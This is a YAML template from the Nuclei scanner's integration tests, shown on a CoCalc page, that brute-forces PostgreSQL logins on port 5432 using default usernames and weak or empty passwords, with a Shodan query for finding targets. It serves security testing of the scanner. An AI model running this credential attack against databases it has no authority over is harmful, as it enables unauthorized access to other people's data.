CoCalc -- postgres-pass-brute.yaml

GitHub Repository: projectdiscovery/nuclei
Path: blob/dev/integration_tests/protocols/javascript/postgres-pass-brute.yaml
²⁸⁴³ views

1
id: postgres-pass-brute
2

3
info:
4
  name: PostgreSQL Password Bruteforce
5
  author: pdteam
6
  severity: high
7
  description: |
8
    This template bruteforces passwords for protected PostgreSQL instances.
9
    If PostgreSQL is not protected with password, it is also matched.
10
  metadata:
11
    shodan-query: product:"PostgreSQL"
12
  tags: js,network,postgresql,authentication
13

14
javascript:
15
  - pre-condition: |
16
      isPortOpen(Host,Port)
17

18
    code: |
19
      const postgres = require('nuclei/postgres');
20
      const client = new postgres.PGClient;
21
      success = client.Connect(Host, Port, User, Pass);
22

23
    args:
24
      Host: "{{Host}}"
25
      Port: "5432"
26
      User: "{{usernames}}"
27
      Pass: "{{passwords}}"
28

29
    attack: clusterbomb
30
    payloads:
31
      usernames:
32
        - postgres
33
        - admin
34
        - root
35
      passwords:
36
        - ""
37
        - postgres
38
        - password
39
        - admin
40
        - root
41
    stop-at-first-match: true
42

43
    matchers:
44
      - type: dsl
45
        dsl:
46
          - "success == true"
47

48

49

Product

Resources

Company